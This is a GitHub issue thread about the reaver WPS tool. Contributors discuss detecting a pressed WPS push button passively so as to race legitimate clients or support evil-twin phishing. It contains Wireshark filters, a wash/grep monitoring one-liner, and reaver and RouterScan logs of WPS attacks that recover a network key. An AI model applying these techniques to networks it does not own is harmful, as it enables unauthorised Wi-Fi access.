Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

How does "sniffing a PBC session" Work ? #107

Open
minanagehsalalma opened this issue Jan 21, 2022 · 44 comments
Open

How does "sniffing a PBC session" Work ? #107

minanagehsalalma opened this issue Jan 21, 2022 · 44 comments

Comments

@minanagehsalalma
Copy link

I am trying to know if it's possible

to know if the WPS button

was pushed on some AP

without trying to connect to it

but with just monitoring it

So i think sniffing a PBC session is what i am looking for , so i would like to know how it works

Thanks

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 22, 2022

there's currently no code in wash or similar tools to know whether the button was pushed.
you just got to be lucky and have a packet capture running while someone submits M1-M7 with the AP, so you can extract all parameters needed for https://camo.githubusercontent.com/18d30ce7809015bae46a7b5e10957e762e269e01a26ab7b8f7accb146520c1f8/68747470733a2f2f692e696d6775722e636f6d2f71565138526e672e706e67 from wireshark.

@minanagehsalalma
Copy link
Author

there's currently no code in wash or similar tools to know whether the button was pushed. you just got to be lucky and have a packet capture running while someone submits M1-M7 with the AP, so you can extract all parameters needed for https://camo.githubusercontent.com/18d30ce7809015bae46a7b5e10957e762e269e01a26ab7b8f7accb146520c1f8/68747470733a2f2f692e696d6775722e636f6d2f71565138526e672e706e67 from wireshark.

@rofl0r Oh! Thanks a lot

So i need to sniff using airodump

and wait for some one to press the button and connect ?
and use the values exchanged between them and the router

To get the password ?

But how do i actually extract these values from a wireshark capture ?

Also this isn't what i meant

I need to detect whether the button was pushed or not
without me or some one try to connect to it

so i can act on it if i notice the button was pushed then i can choose to connect to it or not

I read Here at wifiphisher wpspbc extension That you can detect if a button was pushed or not without needing for someone to connect to it , by just sniffing A WPSPBC IE .... But i wasn't able to understand how

or if it's possible to do it manually

Thanks again for your response
It really helps as i found no mention about the matter online

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 22, 2022

So i need to sniff using airodump and wait for some one to press the button and connect ? and use the values exchanged between them and the router

yes, or using wireshark, or tcpdump or any other tool that can capture packets from monitor if

But how do i actually extract these values from a wireshark capture ?

expand the headers of M1-M7 and look for the relevant fields

I need to detect whether the button was pushed or not

you're the first person needing it so far, so nobody has implemented it. PR adding it to wash is welcome.

@minanagehsalalma
Copy link
Author

expand the headers of M1-M7 and look for the relevant fields

@rofl0r what filter do i use to find the m1-m7 headers ?

what about this

I need to detect whether the button was pushed or not
without me or some one try to connect to it

so i can act on it if i notice the button was pushed then i can choose to connect to it or not

I read Here at wifiphisher wpspbc extension That you can detect if a button was pushed or not without needing for someone to connect to it , by just sniffing A WPSPBC IE .... But i wasn't able to understand how

is it possible or not ?

you're the first person needing it so far

Not really as i mentioned above , wifiphisher needed it and this too "hostbase"

They use an evil twin attack and ask the user to push the button instead of a password .... but they have to stop the deauth of the target clients , So they be able to check if the button was pushed or not
as they wasn't able to figure out a way to check by just monitoring

image

Googling the problem i found a lot of people asking about it but not able to figure it out

And here too they had to use an alternative method because they weren't able to figure out how

https://www.wifi-libre.com/topic-596-vulnerabilidad-wps-pbc-push-button.html

I just want to figure out how to do it using airodump-ng
without any one trying to connect

thanks

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 22, 2022

@rofl0r what filter do i use to find the m1-m7 headers ?

can't recall from the top of my head. just record a WPS session (even if wrong pin) to your router and look at the packets. wireshark somewhere mentions those are iirc EAP packets and also has the info whether M1, etc somewhere listed.

is it possible or not ?

i don't know. you best experiment with your own router and compare packets before you push the button and after. in other words, i can't help you further, you gotta dig into this yourself.

@minanagehsalalma
Copy link
Author

i don't know. you best experiment with your own router and compare packets before you push the button and after. in other words, i can't help you further, you gotta dig into this yourself.

@rofl0r oh thanks a lot you helped me a lot so far

I was able to find it i captured Two captures
one without the WPS PBC button pressed
and one with the button pressed I let it sniff for the whole 2 minutes duration of the PBC connection allowance

Then i tried all the WPS PBC filters from the wireshark wiki
And only two filters showed no results on the non pbc capture
while showing a lot of results on the one with pbc pressed
image

The three filters are
wps.selected_registrar_config_methods.phy_pushbutton
wps.selected_registrar_config_methods.pushbutton
wps.selected_registrar_config_methods

and this one i found by looking at the packets

wps.device_password_id

Now that we know which filters are needed

I still don't know how to do it from the terminal using tcpdump

I am trying to do something like this , but i can't figure out the syntax for using tcpdump and if the matches are zero or not just from bash

HEREAGAIN
If tcpdump wps.selected_registrar_config_methods  != 0 
then echo "The button has been pushed"
break;

else
sleep 10
goto HEREAGAIN

I linked the Two capture files if that would help

Thanks a lot

@minanagehsalalma
Copy link
Author

there's currently no code in wash or similar tools to know whether the button was pushed.

@rofl0r i think that i have found a tool

but it works on older systems with python 2.7 only
wps2key.py

Looks like scapy was the key all along haha
Share

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 23, 2022

a thing that comes to mind is the json mode of wash (wash -j). it also lists stuff like that.

@minanagehsalalma
Copy link
Author

a thing that comes to mind is the json mode of wash (wash -j). it also lists stuff like that.

@rofl0r oh thanks a lot you are right
Using Wash json option

But it misses wps.device_password_id and Selected Registrar config methods Even tho wps2key.py is able to see them, And it's a bit slower but no problem

I am trying to do a check using this syntax
wash -i wlan0 -j -b XX:73:8F:XD:XX -c 8 | grep -zqv "wps_selected_registrar" && echo no || echo yes

But it only prints Yes after i kill it using ctrl + c 😥

anyway thanks a lot you helped me a lot so far

PR adding it to wash is welcome.

Yeah just add another column with WPS PBC
with text Not pushed / pushed in front of each AP in case of a "wps_selected_registrar" match , but that should turned on only if an argument is used like --PBC or something as it slows the scan , and as a bonus you can add an option To make it auto connect when A match is found

I am currently wondering

Does the wps lock matter when using the PBC ?
my network has the lock status as true
but i found no problem connecting using pbc tho
Is that the case with all APs ?

But for some reason Reaver -K -L fails Even using the -N option doesn't help
This error occaurs on the router
image

WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:380
send_packet called from authenticate() 80211.c:411
[+] Sending authentication request
send_packet called from associate() 80211.c:464
[+] Sending association request
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: ~XXXXXXX~).
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=396 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 ec 3e b3 40 7b 22
WPS: Enrollee MAC Address ec:3e:b3:40:7b:21
WPS: Enrollee Nonce - hexdump(len=16): ae fa d8 dd cd 3b 40 58 f9 98 34 4b a5 ec 3f c9
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x238c [Label] [Display] [PBC] [Keypad]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=5):
     5a 79 78 65 6c                                    XXXXX
WPS: Model Name - hexdump_ascii(len=12):
     56 4d 47 33 36 32 35 2d 54 35 30 42               XXXX-XXXX    
WPS: Model Number - hexdump_ascii(len=6):
     52 54 32 38 36 30                                 XXXXX
WPS: Serial Number - hexdump_ascii(len=4):
     31 32 33 34                                       1234            
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=12):
     56 4d 47 33 36 32 35 2d 54 35 30 42               XXXXX-XXXX
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 4
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: Unsupported Device Password ID 4
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 96 72 d5 07 90 3b bf 16 7d b1 1e d5 5a 2f 95 78
WPS: UUID-R - hexdump(len=16): 1a f0 6e 79 80 f3 c4 95 bc 93 14 ee 2b 27 89 9b
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 57 75 d4 3a df 41 7c 4c 15 37 db e1 18 a2 c8 46 bb a6 28 76 97 0c a7 28 b6 92 e5 08 ab 94 5d a5 01 5f 43 88 7b 52 0a 96 9a 62 dc ce 5b a2 4b 8f 47 97 ef ae d4 1a ad e7 2f 6e 07 09 c6 9d 1e 21 f3 5d fb 5e 59 5a 55 a6 b6 c2 fe bf f1 85 9d 17 36 69 70 85 6f ec 78 37 66 9f 59 f3 23 0a 4f 48 7c a1 bb 4c 50 04 5f 7c 22 e0 09 22 b7 82 e8 c4 aa ff ca f2 3c 33 24 09 16 28 1a f9 be d2 ff b5 ad 6c 5c 0c 8f 4f cd 4b 98 e4 a8 17 6f e2 87 ef 7d 2a 81 10 db be 32 46 30 7a 5e 38 19 49 39 e9 3e e1 90 7e 0a 3f bb c2 6c 17 ee 1b 43 df fb 01 0b 7b 26 b0 17 eb ad 93 eb 94 4b 1f 1f 25 b2 a5
DH: public value - hexdump(len=192): 59 8f 9e 90 ad a4 ae e1 96 1f 2e dd e7 61 a6 ef e1 81 bd 07 0f 4e 8e 51 bd 71 5e 9c 08 01 ca b7 6e 6c 43 23 c1 35 3c a2 bf 08 9a 12 22 b7 03 bf 6c 39 46 b0 bd a2 16 ae 5f 4e 85 2b d4 38 b0 a7 01 4d 3c 2c 0a dc cb 47 77 7c e3 71 4e 9a 00 bb b9 8b 3d a0 72 08 56 62 df 4c 54 80 a3 c1 35 46 b8 fe 95 54 5a f8 de 6f 98 3f 3e 38 6f 96 60 7c ad e8 6f 40 c0 d8 35 a4 f9 6c eb 78 7d 39 89 88 ca 13 e6 2a cb 6e f7 d6 b2 c5 4a 94 c5 67 37 1f e5 27 98 33 53 26 ef a9 96 e7 75 e8 4a eb ba 20 bb d5 44 70 80 80 c6 0a db 32 04 91 f3 dd c6 e7 9d 62 84 a8 b4 35 06 74 b3 6e da cd 2e fb fc e4
WPS: DH Private Key - hexdump(len=192): 57 75 d4 3a df 41 7c 4c 15 37 db e1 18 a2 c8 46 bb a6 28 76 97 0c a7 28 b6 92 e5 08 ab 94 5d a5 01 5f 43 88 7b 52 0a 96 9a 62 dc ce 5b a2 4b 8f 47 97 ef ae d4 1a ad e7 2f 6e 07 09 c6 9d 1e 21 f3 5d fb 5e 59 5a 55 a6 b6 c2 fe bf f1 85 9d 17 36 69 70 85 6f ec 78 37 66 9f 59 f3 23 0a 4f 48 7c a1 bb 4c 50 04 5f 7c 22 e0 09 22 b7 82 e8 c4 aa ff ca f2 3c 33 24 09 16 28 1a f9 be d2 ff b5 ad 6c 5c 0c 8f 4f cd 4b 98 e4 a8 17 6f e2 87 ef 7d 2a 81 10 db be 32 46 30 7a 5e 38 19 49 39 e9 3e e1 90 7e 0a 3f bb c2 6c 17 ee 1b 43 df fb 01 0b 7b 26 b0 17 eb ad 93 eb 94 4b 1f 1f 25 b2 a5
WPS: DH own Public Key - hexdump(len=192): 59 8f 9e 90 ad a4 ae e1 96 1f 2e dd e7 61 a6 ef e1 81 bd 07 0f 4e 8e 51 bd 71 5e 9c 08 01 ca b7 6e 6c 43 23 c1 35 3c a2 bf 08 9a 12 22 b7 03 bf 6c 39 46 b0 bd a2 16 ae 5f 4e 85 2b d4 38 b0 a7 01 4d 3c 2c 0a dc cb 47 77 7c e3 71 4e 9a 00 bb b9 8b 3d a0 72 08 56 62 df 4c 54 80 a3 c1 35 46 b8 fe 95 54 5a f8 de 6f 98 3f 3e 38 6f 96 60 7c ad e8 6f 40 c0 d8 35 a4 f9 6c eb 78 7d 39 89 88 ca 13 e6 2a cb 6e f7 d6 b2 c5 4a 94 c5 67 37 1f e5 27 98 33 53 26 ef a9 96 e7 75 e8 4a eb ba 20 bb d5 44 70 80 80 c6 0a db 32 04 91 f3 dd c6 e7 9d 62 84 a8 b4 35 06 74 b3 6e da cd 2e fb fc e4
WPS: DH Private Key - hexdump(len=192): 57 75 d4 3a df 41 7c 4c 15 37 db e1 18 a2 c8 46 bb a6 28 76 97 0c a7 28 b6 92 e5 08 ab 94 5d a5 01 5f 43 88 7b 52 0a 96 9a 62 dc ce 5b a2 4b 8f 47 97 ef ae d4 1a ad e7 2f 6e 07 09 c6 9d 1e 21 f3 5d fb 5e 59 5a 55 a6 b6 c2 fe bf f1 85 9d 17 36 69 70 85 6f ec 78 37 66 9f 59 f3 23 0a 4f 48 7c a1 bb 4c 50 04 5f 7c 22 e0 09 22 b7 82 e8 c4 aa ff ca f2 3c 33 24 09 16 28 1a f9 be d2 ff b5 ad 6c 5c 0c 8f 4f cd 4b 98 e4 a8 17 6f e2 87 ef 7d 2a 81 10 db be 32 46 30 7a 5e 38 19 49 39 e9 3e e1 90 7e 0a 3f bb c2 6c 17 ee 1b 43 df fb 01 0b 7b 26 b0 17 eb ad 93 eb 94 4b 1f 1f 25 b2 a5
WPS: DH peer Public Key - hexdump(len=192): a0 51 19 12 7b c8 18 8a d4 2f 86 93 d9 9b 13 16 50 6b a8 01 0c f9 89 86 99 c1 db 14 9d 74 2c 12 17 a4 a6 9f ca 5f 10 17 9d 47 ae 78 ec af 5e 1c e2 2d d9 5c 16 3d d4 f4 4a 40 10 86 58 ab 38 59 94 8b 5c 88 9f c1 e1 22 b4 99 77 e6 63 e4 da 38 f1 29 a3 2b 3f 86 93 7b 7c c1 52 ef 6f c8 57 87 82 32 d2 84 09 e6 2c 9c 81 80 2f dc ca 21 41 5c bc 06 94 7d 69 3e ba 5c e2 a7 27 b1 2f 01 a3 56 69 f7 27 96 70 c1 f7 60 10 fb 02 2e 24 1a 99 0e 4f 7f 9e 43 ea a3 c2 c2 a8 38 b5 bb 12 1a 64 74 ec bb 54 40 45 68 5e ba f5 1a db 57 43 b1 87 df 7a 6f 68 cc da ac 6b cd 8c 2e 85 2a 57 04 18 ca
DH: shared key - hexdump(len=192): cc 7a 77 54 14 9d 4e 6f cd e9 6d 53 9f 8e ae 16 f1 e5 cd 7c 3b 1c a9 65 a6 f9 a0 7d 9f b2 3a 6a 7b 29 4b 50 7f 86 85 79 6d fb b6 cb d1 cc 1d ce 7e 73 d5 4e 84 c7 d5 18 3a fc bd 4f 39 5a 9d 39 94 ef 57 0c 92 f0 65 bc 74 69 ab fa 04 3e 5d 64 ca 6a 05 16 aa 8a f3 88 96 f6 14 da d8 ba d2 fc f0 97 1e d1 01 62 61 41 db 02 cc 65 13 29 84 62 e6 86 f7 cf bb 86 0d 76 94 41 42 f7 19 6e ce dc 5e 27 e0 81 03 17 32 be 87 f0 b8 60 78 03 f2 1e 30 3d 52 99 9a 2b 74 fe 1e 0a a8 e4 09 d1 88 35 cd ff b9 62 0d 6f b9 fe 6d fc c3 5e 96 80 79 7b f3 68 03 38 a3 1f 01 b8 0d 2c 17 5d c8 46 e7 ae
WPS: DH shared key - hexdump(len=192): cc 7a 77 54 14 9d 4e 6f cd e9 6d 53 9f 8e ae 16 f1 e5 cd 7c 3b 1c a9 65 a6 f9 a0 7d 9f b2 3a 6a 7b 29 4b 50 7f 86 85 79 6d fb b6 cb d1 cc 1d ce 7e 73 d5 4e 84 c7 d5 18 3a fc bd 4f 39 5a 9d 39 94 ef 57 0c 92 f0 65 bc 74 69 ab fa 04 3e 5d 64 ca 6a 05 16 aa 8a f3 88 96 f6 14 da d8 ba d2 fc f0 97 1e d1 01 62 61 41 db 02 cc 65 13 29 84 62 e6 86 f7 cf bb 86 0d 76 94 41 42 f7 19 6e ce dc 5e 27 e0 81 03 17 32 be 87 f0 b8 60 78 03 f2 1e 30 3d 52 99 9a 2b 74 fe 1e 0a a8 e4 09 d1 88 35 cd ff b9 62 0d 6f b9 fe 6d fc c3 5e 96 80 79 7b f3 68 03 38 a3 1f 01 b8 0d 2c 17 5d c8 46 e7 ae
WPS: DHKey - hexdump(len=32): ff 23 d1 1f 1f 0c be 3c 41 4f dc 00 f5 e5 70 32 a2 c0 3e c3 d0 2b 77 22 6b 3d ca 3c d3 0e db 99
WPS: KDK - hexdump(len=32): be 3e 80 5c db 6f 80 68 bf 26 bb d9 89 f5 5e e4 3b ac f0 41 58 7a 09 3f 82 21 84 1f a5 75 28 fa
WPS: AuthKey - hexdump(len=32): 37 ae c3 76 92 46 df 3f 84 fe 71 32 c2 cd e5 a5 ea 21 63 ed c6 a4 06 b8 40 54 cc 47 ca 94 6a be
WPS: KeyWrapKey - hexdump(len=16): 71 56 a6 35 29 8f ac fa a5 10 d4 31 a2 e6 7a 2e
WPS: EMSK - hexdump(len=32): fc 1f da 04 ae 73 88 90 29 5f c4 1a 59 13 ed a5 b4 48 aa 27 11 a2 de 7e 0d 2d 47 d9 ef fd 2c 7b
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (0)
WPS:  * Association State
WPS:  * Configuration Error (0)
WPS:  * Device Password ID (4)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=66 op_code=3)
WPS: Received WSC_NACK
WPS: Unsupported attribute type 0x1049 len=6
WPS: Enrollee terminated negotiation with Configuration Error 15
[+] Received WSC NACK
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
[!] WPS transaction failed (code: 0x04), re-trying last pin

Even that using Pixie dust on Routerscan success with no problem in the same situation !
What the problem ??

[*] Associating with AP...
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: ~XXXXXXX~).
[*] Warning: AP is locked.
[*] Waiting for pin "00000000"...
[*] Sending EAPOL Start...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received WPS Start.
[*] Sending WPS Message M1...
[*] PKE: 8AD2042450A59BA8BC7FA54E8B744D4407F4D1CCC7608B8BBCB6D43FF1302540FEAABA1EE3BFB9448D790047817003066623861D5XXXXXXXXXXXXXXXXX179ED4BCBEC8497F1352F8195C54FF52008560EB924CFBBA00644651AEC7D987939B736ECF0AAAB9D46165A874FF995956B925B9F14507831B969C88C8D8455423851239774465ABE338407FDBC75E900FABA50AF544C02224A34C3A1BFA5BE36733656535F08D5310EE4ECC56F570B49EB26681E88ECC48251225DB
[*] Received WPS Message M2.
[*] R-Nonce: 65F27C09AEBXXXXXXXXXX1F98FD9
[*] PKR: FFD666E8F35F7FCD889998CC22FBF2C1C76ACCF0773CA7D8974AC11A5237629512B62780633391C7333C034AA5CC60B79B26E7C8E63DF6CXXXXXXXXXXXXXXXXXXXXXXXXXXE68551F309B2A6527A9FF160AD241F08640D9522B5DC4C91AAB61B26E0087F24B7B7C46BEE2C220F0DF985774F08C17F4A1741E24E0FF7DC8AE2FD9033BF733702D3FCC4F081B6BA48093D7A3070D08EA115115EB879782445A80E4B8822657318DA00357262C33FC3D1D4D8CC022450CDA187BC4819F412A67
[*] Manufacturer: XXXX
[*] Model Name: XXXXX
[*] Model Number: XXXX
[*] Serial Number: XXX
[*] Device Name: XXXXXX
[*] AuthKey: DF8FD6BF19BA5C060D7EBCDXXXXXXF1888F8564D1BF0F2226D6EC1A7F0
[*] Sending WPS Message M3...
[*] Received WPS Message M4.
[*] R-Hash1: DDF3FC51F7398E513CEE0XXXXXXXXA52E6234995F3FDFA
[*] R-Hash2: 6E3CA58ECC37CB199C2A799XXXXXA5EF10EC231CAC76D75D1DDD2A5145C4F2
[*] R-S1: 04A9C4BABD12E060XXXX56089F57CC
[*] Sending WPS Message M5...
[*] Received WPS Message M6.
[*] R-S2: 820C0D464FC46D551C9FXXXx51115
[*] Sending WPS Message M7...
[*] Received WPS Message M8.
[*] Sending WSC DONE...
[*] EAP session closed.
[+] WPS transaction succeeded!
[+] SSID: XXXXXXXXX
[+] Key: XXXXXXXXXXXX
[+] Key Index: 1

This is Router scan configuration
image

Even when disabling PixieDust it still works !

[*] Audit started at 2022.01.23 23:00:45 (UTC+02:00).
[*] Associating with AP...
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: ~XXXXXXX~).
[*] Warning: AP is locked.
[*] Waiting for pin "000000"...
[*] Sending EAPOL Start...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received WPS Start.
[*] Sending WPS Message M1...
[*] Received WPS Message M2.
[*] Manufacturer: XXXX
[*] Model Name: XXXXX
[*] Model Number: XXXX
[*] Serial Number: XXX
[*] Device Name: XXXXXX
[*] Sending WPS Message M3...
[*] Received WPS Message M4.
[*] Sending WPS Message M5...
[*] Received WPS Message M6.
[*] Warning: R-Hash2 security check failed.
[*] The AP sent wrong 2nd pin part.
[*] Sending WPS Message M7...
[*] Received WPS Message M8.
[*] Sending WSC DONE...
[*] EAP session closed.
[+] WPS transaction succeeded!
[+] SSID: XXXXXXXXX
[+] Key: XXXXXXXXXXXX
[+] Key Index: 1
[*] Audit stopped at 2022.01.23 23:00:58 (UTC+02:00).

Second : Why Wash doesn't refresh results ? i Mean it only outputs each network status for once for each run
And needs to Exit and then start again for status refresh and using -s scan mode doesn't make any diff ! so ...

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 23, 2022

What the problem ??

i don't know, maybe @binarymaster can shed some light on this difference.

Second : Why Wash doesn't refresh results ?

because wash isn't a tool for real-time monitoring, but for one-shot information gathering. in order to work as you want, you'd need to start it in a way it's automatically terminated after e.g. one sec (like sending a SIGALRM to it, iirc there's some shell tool to achieve that), and only using the channel of the target ap.

@minanagehsalalma
Copy link
Author

and only using the channel of the target ap.

@rofl0r hmm what do you mean ?

there's some shell tool to achieve that

What's its name?

i don't know, maybe @binarymaster can shed some light on this difference.

Yeah cause i even tried bully and it still fails

bully  wlan0mon -c 3 -b XX:3E:XX:40:XX:21 -v 4  -p 1234567 --lockignore
[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY([email protected])
[+] Switching interface 'wlan0mon' to channel '3'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'XX:XX:XX:21:XX:bb' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'XX:3E:XX:40:XX:21' on channel '3'
[+] Got beacon for 'XXXXXXXXXXXXXX' (XX:3E:XX:40:XX:21)
[!] Beacon information element indicates WPS is locked
[+] Index of starting pin number is '1234567'
[+] Last State = 'NoAssoc'   Next pin '12345670'
[+] Rx(  ID  ) = 'Timeout'   Next pin '12345670'
[+] Rx(  ID  ) = 'Timeout'   Next pin '12345670'


@binarymaster
Copy link
Contributor

Does the wps lock matter when using the PBC ?

I think not, since you are explicitly pressing a physical (or virtual) button. Some routers may clean lock flag on button press, some may not.

i don't know, maybe @binarymaster can shed some light on this difference.

I'm actually tracking this thread from the beginning 😄 Would be nice to have a passive way of WPS button press detection when scanning networks (preferably using Probe Response data) so I can integrate this into Router Scan.

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 23, 2022

i don't know, maybe @binarymaster can shed some light on this difference.

I'm actually tracking this thread from the beginning 😄

i suspect the problem lies here in reaver code/output:

WPS: Enrollee MAC Address ec:3e:b3:40:7b:21
WPS: Enrollee Nonce - hexdump(len=16): ae fa d8 dd cd 3b 40 58 f9 98 34 4b a5 ec 3f c9
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
...
WPS: Device Password ID 4
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: Unsupported Device Password ID 4

what does routerscan do differently here than reaver?

there's some shell tool to achieve that

What's its name?

if i would recall i'd already told you. google "shell terminate command after 1 sec"

and only using the channel of the target ap.

@rofl0r hmm what do you mean ?

the idea is that you run wash in a loop targeting only the channel the device uses so no time is wasted scanning different channels, and as soon as you have the magic string in the json output you know that now's the time to start sniffing packets for the WPS interchange.

@binarymaster
Copy link
Contributor

what does routerscan do differently here than reaver?

I think Router Scan just ignores what the AP sends in the "Device Password ID" field.

However when it's configured to Enrollee mode, it sends M1 message first, and the "Device Password ID" is equal either to 0 (PIN mode) or 4 (PBC mode) - depending on what setting is chosen in the GUI.

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 23, 2022

i currently don't have a router with wps button available to test this. maybe @feitoi is interested to look into what's going wrong here ?

@minanagehsalalma
Copy link
Author

you're the first person needing it so far, so nobody has implemented it.

😏😏

I'm actually tracking this thread from the beginning 😄 Would be nice to have a passive way of WPS button press detection when scanning networks (preferably using Probe Response data) so I can integrate this into Router Scan.

@rofl0r Haha see ?

@binarymaster You can use the waircut method , it's on windows too

Directed against any AP in the radius of action. It scans all the APs until it detects one that has started the push-button protocol and tries to connect to it before the legitimate client does. You will see that while it is scanning, the list of Aps is continually updating, both the signal level of each one and the number of them, it is like having a continuous scan, so to speak.
image

image

Source : Liberada la versión 1.9

I think not, since you are explicitly pressing a physical (or virtual) button. Some routers may clean lock flag on button press, some may not.

oh

if i would recall i'd already told you. google "shell terminate command after 1 sec"

Thanks i was able to do it using the timeout function
Even that i want to get it to go in loop if not found, but this will work
timeout 10s wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8 | grep -zqv "wps_selected_registrar" && echo no || echo yes

and as soon as you have the magic string in the json output you know that now's the time to start sniffing packets for the WPS interchange.

Hmm or you can connect using wpa_cli wps_pbc
But if you like to go the sniffing method, then why not just airodump on the wanted channel all the time ?

I think Router Scan just ignores what the AP sends in the "Device Password ID" field.

So....
when the

Device Password ID is equal to 
4 (PBC mode)

It still continues to use the same method it was set to use ? How is that possible that Pin method is able to work on routerscan when the Device Password ID is 4 which means PBC only? That doesn't make any sense

i also noticed that when even the wps method is set PUSH BUTTON AS enrollee
It still asks for a Pin!

That doesn't seem right to me !
image

Thanks

@feitoi
Copy link

feitoi commented Jan 25, 2022

Hello everybody!

In my a modified version of wash, I put to monitor wps_selected_registrar, and my analysis is:
"wps_selected_registrar" : 01 does not mean all routers are in PBC mode, some routers also have "wps_selected_registrar" : 01 in PIN mode, and these routers, 95% or more are vulnerable to Pixie Dust attack, I also believe these routers disable/vanish WPS function if it doesn't end with WSC_NACK, but this issues has already been solved in reaver.

I think not, since you are explicitly pressing a physical (or virtual) button. Some routers may clean lock flag on button press, some may not.

I confirm, @binarymaster

But for some reason Reaver -K -L fails Even using the -N option doesn't help
What the problem ??

When WPS button was pushed, the AP temporarily change the PIN to 00000000 and change lock flag to unlocked or not, if AP is not vulnerable to Pixie Dust attack then reaver will not work. Better to add -p 00000000 and it responds don't restore previous session.

Does the wps lock matter when using the PBC?

Matter to reaver, reaver needs WPS unlocked. Update reaver and I believe you will see nack code is 0x000F see my comment

@minanagehsalalma
Copy link
Author

Hello everybody!

Hello @feitoi

In my a modified version of wash, I put to monitor wps_selected_registrar, and my analysis is:
"wps_selected_registrar" : 01 does not mean all routers are in PBC mode, some routers also have "wps_selected_registrar" : 01 in PIN mode

Hmmm interesting, So how do we actually use Wash to detect if the WPS button was pushed or not ?
I would have used wps.device_password_id == 0x0004 but wash doesn't show that in the Json mode

Also does the same thing happen for this filter too ?
wps.selected_registrar_config_methods.pushbutton

and change lock flag to unlocked or not

Nah the lock doesn't get cleared for me when i push the button , Idk if it gets cleared during the 120 seconds and not after or not... but it's currently still locked after pressing it like dozen times

Better to add -p 00000000 and it responds don't restore previous session.

So.... That way Reaver would work with PBC ?

Matter to reaver, reaver needs WPS unlocked

But why , When it doesn't matter if the WPS button is pushed , the lock doesn't matter as you said.

In my a modified version of wash, I put to monitor wps_selected_registrar, and my analysis is:
"wps_selected_registrar" : 01 does not mean all routers are in PBC mode, some routers also have "wps_selected_registrar" : 01 in PIN mode

Dang it , That means I answered my question wrong on
unix.stackexchange 😥

@rofl0r
Copy link
Collaborator

rofl0r commented Jan 25, 2022

@minanagehsalalma

I was able to find it i captured Two captures

it seems google drive wants me to login, so i cant download. can you upload it to 0x0.st instead ?

@minanagehsalalma
Copy link
Author

it seems google drive wants me to login, so i cant download. can you upload it to 0x0.st instead ?

why this weird site

@rofl0r

Here it's
WPS PBC.zip

@minanagehsalalma
Copy link
Author

I see that @drygdryg added a --push-button-connect : Run WPS push button connection option

Can you tell Us how you added the

Experimentally implemented WPS PBC mode in OneShot ?

Also , Can it take a channel and bssid as an argument ?

